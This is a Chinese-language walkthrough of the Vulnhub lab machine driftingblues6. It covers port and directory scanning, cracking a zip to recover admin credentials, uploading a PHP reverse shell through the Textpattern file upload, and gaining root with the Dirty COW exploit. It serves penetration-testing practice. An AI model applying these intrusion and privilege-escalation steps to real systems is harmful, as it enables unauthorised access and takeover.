Vulnhub靶机driftingblues6_vh

Vulnhub靶机driftingblues6_vh
Vulnhub靶机driftingblues6_vh_第1张图片

arp-scan -l 扫描靶机地址:192.168.245.142Vulnhub靶机driftingblues6_vh_第2张图片
nmap -sV -p1-65535 -T4
就开了一个80
Vulnhub靶机driftingblues6_vh_第3张图片
dirb http://192.168.245.142
扫描到几个有感觉用地路径
http://192.168.245.142/textpattern/files/
Vulnhub靶机driftingblues6_vh_第4张图片
看看robots
http://192.168.245.142/robots.txt
User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute

//他这里提示咱扫 .zip
http://192.168.245.142/textpattern/textpattern/
是个后台
go: dirb http://192.168.245.142 -X .zip
ee没有试试gobuster
gobuster dir -u http://192.168.245.142 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip
Vulnhub靶机driftingblues6_vh_第5张图片嗯。。。。。字典有问题Vulnhub靶机driftingblues6_vh_第6张图片
看看zip有啥,需要破解
Vulnhub靶机driftingblues6_vh_第7张图片
myspace4(不知道为啥要加–show ,第一次没加出来了,第二次加–show才破解)
mayer:lionheart 查看creds.txt
登录后台,conten->files可以上传文件。reverse_shell;go
http://pentestmonkey.net/tools/php-reverse-shell
Vulnhub靶机driftingblues6_vh_第8张图片
Vulnhub靶机driftingblues6_vh_第9张图片
Vulnhub靶机driftingblues6_vh_第10张图片
访问我们地shell,拿到shell
然后ttyshell
uname -a 可以使用脏牛
Vulnhub靶机driftingblues6_vh_第11张图片
searchsploit dirty
Vulnhub靶机driftingblues6_vh_第12张图片
下载
在这里插入图片描述
查看说明
Vulnhub靶机driftingblues6_vh_第13张图片
开放服务:
python3 -m http.server 8001
靶机进入tmp下载.c
Vulnhub靶机driftingblues6_vh_第14张图片
编译运行:
gcc -pthread 40839.c -o dirty -lcrypt
./dirty
whoami
Vulnhub靶机driftingblues6_vh_第15张图片
Vulnhub靶机driftingblues6_vh_第16张图片以firefart身份登录
Vulnhub靶机driftingblues6_vh_第17张图片
此时自己已有root权限
在这里插入图片描述
进入root,看到一个flag.txt
Vulnhub靶机driftingblues6_vh_第18张图片
congratulations!

你可能感兴趣的:(渗透测试,靶机)